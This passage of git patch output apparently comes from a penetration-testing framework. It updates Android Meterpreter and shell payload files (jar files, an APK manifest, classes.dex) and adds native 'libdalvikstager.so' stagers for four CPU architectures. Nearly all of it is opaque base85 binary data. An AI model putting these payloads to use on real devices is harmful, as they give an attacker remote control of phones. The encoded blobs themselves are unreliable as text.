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 XZE3=CIsrJ%Av3_?G>GcV|MmU{+qYQd 
diff --git a/data/android/metstage.jar b/data/android/metstage.jar index 9a3d4d63152a411f0ef1545c9b25de6d6986e8c5..095c7b9a64a328b35850cdffccaaae6fcd8dca33 100644 GIT binary patch delta 1647 zcmV-#29Wv554#QyP)h>@6aWYa2mpm@XGD<>XC+(ka`AEj08mQ@2wpVAkVXIi07w7; z08mQ<1QY-W2nYa$YG*`|nj3$GmR)QVRTRh1%$GEUg4npsN)Ku(d)9 z)yh^#AWbL_GVD&%$0TP9JNh!&@|XGr|E!ZtyXy&Eh`L>A;7NEz}AIkNvGNB5T$qO4AI4f2Lc zbQAmq?tr`CZy;+#8Zf~oFac)43*cSwEw~D902#izzyR0_j)5|G5xfpQ2fu*p;5N7e z?t*`S7AG=53)l#Df`fnH2si;|!K>hH@ILqid;@*}SHW-KcW@ot1h;`=5Ve7Ruo(=2 zJlGE=!8CXloCasWIq(u#25*9Qz(?RS@RbqG8K#Qhns7^)Zc2b8XaOnEO3|FB0V_;9 z=m4Fd3#=2hc>rX=M$iZP!9&8oBgzGa{d5tBtRm48~(M`w{j}*_yy+=wW*t8}tM6tpwss#`}yko@j^e zXFKU4B@G9C{A>sMB#j<(54SVjx4PI9>i<2ld+ig7Z)tys$CUdwcA!l~rTb!W9>-C{ zVX_JuyA2h39D1K-pe;$`=-Y}_?prC$q;Iw0+6Q_K1$S(glScWNLWf`JF&;+W7+s>I z?pp@)VMP8Bi^b}fndpC`lQL#+LZ``uVP<-I6K13h^d{s;+jBA@am~+W=rwrHJl+3c z7iAKYDKmeOSwGo|>y}9i*L)^<#s=E2jmfSx{X0cp9qV1ju9w8#i1sM^N9(_Xq(Rb#UEd8yNE#z)f}{e;g)zY7G<6qj zzf=j_Qmz>Iq2q_SF(wzoJoVL^%Jz~M*ri-Gv}b>v+@upam2!n$^VEC)K1bL!Pd$Z_ z?VWW`=WO2(LOXN=KX-Jl5-e2n^kBWMx>OCF`P_bIam=%;)dIXQ&)tPn_E|gU2D$xq zXixa%T6iR^IQD#=QmakluE&RIzCTn8oBDRHw%u!Qi|n55&*nyhz;kRrPw6Hj4<=9T zYfXQ{10#9rT5GLG-ObJmnO_du@oy^=DU;ZnBNmT#tL+(9~3M zW<2;{rK*ONS}_dJ!D=eZAnQveFGHlqjvhOFfTSssrwXJ_74Rczn&ji7lsW$2wA+r~ zC*pgI^^i5YTz32tC5nxCAhqZPRfo0}gZY2Kc_*~1WiN0;rmjY~FIqQEL6csLmLA25 zLB(OW6{q0%)KWyvLgyK0fz_9^lH;L2=_P0JupQ2k<}A9^uu8ER)*NS7ZdYf#T6K<; znV?Lqvrf40WHs<=Vbqv{p{aDyePcdJc6~C~lIERAN9=B^QEZY^ECySuUY%~KIl*VhGw?sNqC;X6Fst)Ui!N%s`PlbmHau4U+D#gPf znqX4T+FlLGa&c&e)P;(RjOG%h3IG65O92rA6aW+e t2nYxOg=%L+UNppzlSl_X4uxuGM5-S$W8nn=0PqTvlm{;crUn22006oKAK(B0 delta 1790 zcmV@6aWYa2mn-Kyh4!W4zkP4t%)EJT-t6vFoON^0z7fjb4b1GWo45Y?W6QTQpL~D%{PiCmT{(a2 z_wv;?q8bsc&+X5W`2A`Uoub(O0QguU%0LdtMEIxMxb#8Z75CQ^qN@fJmFR#@Gzuoc zF>nIRg45tR@FF-57Qjp3J@5ti5&Q+Z;b#XJ2lK!OuYz~LC*W)F6SxD~5=4)IXTTY7 z9#p^*xBvoB2OHoe@D_jg5PS~42S0;fz;EDB@Hg|9BpLxlFbSr>JXisj!E4|OcoV!0 z-UlCn&%l@9I`|I!0&asl;2&UOO>>|J>;SvLKJW}U0ZxN?GhR2a)`qW_@Kd-bNi9r`w*?-Blc 
zTH-v;<4e(2V(X~W2$wQF!KFe^^PE#WPX!|;xooE?o_{QLthB_XMn#@a2OSZ49p&>R zXg^<*6b*CPK_`FtyeiG|HEE**d=27xEc{LLeB=8JM(pC!6f!|2z6J&z;x&!?tDwD?S65n%+us_B2 zj`j$7RtDLpq(L=122|| z)iLFvZQbya#Qx42-X57|jg;c$+p%Vzl|qbzsNSFv$6)aJmf*!nu(@;e8uJL-G48pG zd4^+I zm+zoD{AG_1z1~OJWzo; zKD#FD5;dP$iQ@N$C2HIyY?hFHE#sN&6=My=A>)5-p^ANK;Td4<-J}k$*a7LIuIEN$ zBu$VsMe-EtTq3zN0ZOElO0bpYsjp;vmB4o^g|hEOju#asm|TyFG}vgW*&9{gt`x$^ zUUCXEPUHl&fL)6;@c(_zvTKq0OBK6%$-PjpJ8yWGRP8V<<;uZ*(h-A)gq-gn~u6wK27WW$$He%w|leg zUVARKS8Z>pFz)+R$M%YpX)*F(iqv_(X>`|Ek$Ud8HlproX*jZ8c4{o=B4u05Cl^+n za&)f^QMumIX3{OT@w!{(p0~C%1K3IRL!YHVhBR|;mSC8Ck;S8$cBTK8LSi`KD zOkSE;SD$_H)De>ANS-T^Hdn%rq*omZ5} zPDxVagYxvcLXSxYpT=uztNPU8$H$HIw4xR>Zz%diW?GT=$-5P4Z_gNp>^FZ$$E19R zLc@luYKPjprM(%FHECu*>P_>n;4ADSFH6cRFRQO7B>CNhCVh~k<{6{)9oIO&viD-+ z469J{9II0EEUQuTJgZalOsiPJCwt%KIzUP$?_slJ0dXe(W3vYUwdWVv delta 86 zcmdnXx0jDEz?+#xgn@&DgCQhokJCiHbk*6Pi#`@HG6ZRF2yob$>1;m;BkIfzc&@~un From 66ff5998a5454f9a29926a4d6342d41c63120ca0 Mon Sep 17 00:00:00 2001 From: joe Date: Mon, 10 Mar 2014 18:50:27 -0700 Subject: [PATCH 049/853] New multi-arch stagers. --- data/android/apk/AndroidManifest.xml | Bin 3536 -> 3540 bytes data/android/apk/classes.dex | Bin 10700 -> 10040 bytes data/android/apk/resources.arsc | Bin 1088 -> 580 bytes .../libs/armeabi-v7a/libdalvikstager.so | Bin 0 -> 13436 bytes data/android/libs/armeabi/libdalvikstager.so | Bin 0 -> 13432 bytes data/android/libs/mips/libdalvikstager.so | Bin 0 -> 5328 bytes data/android/libs/x86/libdalvikstager.so | Bin 0 -> 5220 bytes data/android/meterpreter.jar | Bin 37700 -> 38353 bytes data/android/metstage.jar | Bin 1851 -> 1851 bytes data/android/shell.jar | Bin 1853 -> 1853 bytes 10 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 data/android/libs/armeabi-v7a/libdalvikstager.so create mode 100644 data/android/libs/armeabi/libdalvikstager.so create mode 100644 data/android/libs/mips/libdalvikstager.so create mode 100644 data/android/libs/x86/libdalvikstager.so 
diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml index 6ee7f3e36fed7e9e467fff4db6fd95f5a44848f9..57e86cd85b8f352caeb6fec49f73ddec852c075a 100644 GIT binary patch delta 285 zcmZ9{KS~2Z6vy%J+uhk+$gGIkB(W0$!9uXGu+9Zi2!a+G2&9Nj2o@o*2Z&9WTci+i z19ldkKp{u4unbngMt?RI4t$t-kN1apZLXR{OwOtRW1ok4aaaz4iQLJ%e8`t<8JtQ- z&SfG?Nh7$Fd)dfw3?o^}r<^1(l^5B_j)RtTq$eX;$g|YAoj+aF9Ye0^(bo-*F$2AC z=vQrH^}8X@{DHRoRh$u9 Mrubi1Rr;>|0DUhsL;wH) delta 320 zcmaLSFHb^I7{~G7bN|S7p1ZNhrrWu01{*;F!77lc^U-&dsqD3m1GL466wSOW^|)*$u3$ RO|u`JyM6!9_2SiC*cx>WG`0W$ 
diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex index 3a45c8b3fbe7179ddfdaa76d4df59f50dc4e90ac..ff39e87f11448e4c3543e9611c6a19b1d18aa857 100644 GIT binary patch literal 10040 zcmai)3wRvWb;r-0nSE$?wO*}kOIjprt%of?q?P5TEXgnVB}=kpX)TOxFss$bT6;CS z+MSgp^1ulcNPvd4;5aSe0~$Uk5HJn!5eTUX2~Y~*9sE&R+|+3r$_F$}C`t1*{hvFt z@>&=e`?u%Zd(VB$x#!+Hn%!Z2($l#^a0R#p+zU>DH^A?~ zyfV}UL*T360q`PtAGphjmV(`29NY{}f|tR60#^l58CVW>fFY0r*MskZC&0_#H^3Pp zsszoT8yo~#@D1=ia0qzP;S!{9pbU2qEg0#GGU4Oj^}!KFY4hd~CM0N()* zfk(j)z?0x9@Kf+ScnQ1#-UerYvkLbLB49aK117eh96SeJ182amKuI-G2-Jc_papCMd%&e&1Y|%Cd} z2Yv?L1ZTjn!3W@vz%id_7N`bwpc$+M8$d7E2QCNWU;QSb!#5qK5+ z9J~d74Soau50uv6o;Cb*8I1SE#cY#ui zwFyc9mZ@B~vmmh?2q8}hWkQIO9fpKZAWR>@)f5I88lf3Nb*cmP0NVmB1Px#jSPYhc zrJxZsfe2^@yk9H_E5J&y3akceKr2`a+CV$#0PDbdumNlYn?NVn47Px+U>n#Dy1)+5 z4F*9B=wJjK0;3=S4ud1W4fuLtw&e$5C8-#abgG(6Qyoi*@!NU#zp=_+p)X z#~15Zdh$Yb>C1dO>{GtjhW*JGZ;7nGZTH3g<*O91&f{Sl*3UvOfn@)`2Oa;V&h4`e z&&6+{bNf6Ge6dXn$d6$KXX0XC@f`4VF<_nh+H327gno&wYiK;L`wH~g&@Z)ZDhu)( 